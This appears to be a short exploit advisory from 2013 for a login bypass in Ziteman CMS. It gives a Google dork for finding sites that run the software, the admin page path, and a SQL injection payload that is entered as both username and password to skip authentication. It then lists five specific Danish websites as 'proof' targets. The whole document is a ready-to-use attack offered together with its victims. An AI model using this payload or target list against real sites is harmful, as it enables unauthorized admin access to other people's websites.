#******************************************************************************** # Exploit Title : Ziteman Login page Bypass Vulnerability # # Exploit Author : Ashiyane Digital Security Team # # Software Link : http://www.ziteman.dk # # Tested on: Windows 7 , Linux # # Google Dork : intext:" Powered by Ziteman CMS" # # Date: 2013/10/10 # -------------------------------------------------------------------- # Exploit : Login page bypass # # Location : [Target]/admincss/default.asp # # Username :1'or'1'='1 # # Password :1'or'1'='1 ###################### # Proof: # # http://www.ark-jr.dk/admincss/default.asp # # http://www.apservice.dk/admincss/default.asp # # http://www.cjservice.dk/admincss/default.asp # # http://www.slibecentral.dk/admincss/default.asp # # http://www.vhm.dk/admincss/default.asp # ###################### discovered by : ACC3SS ######################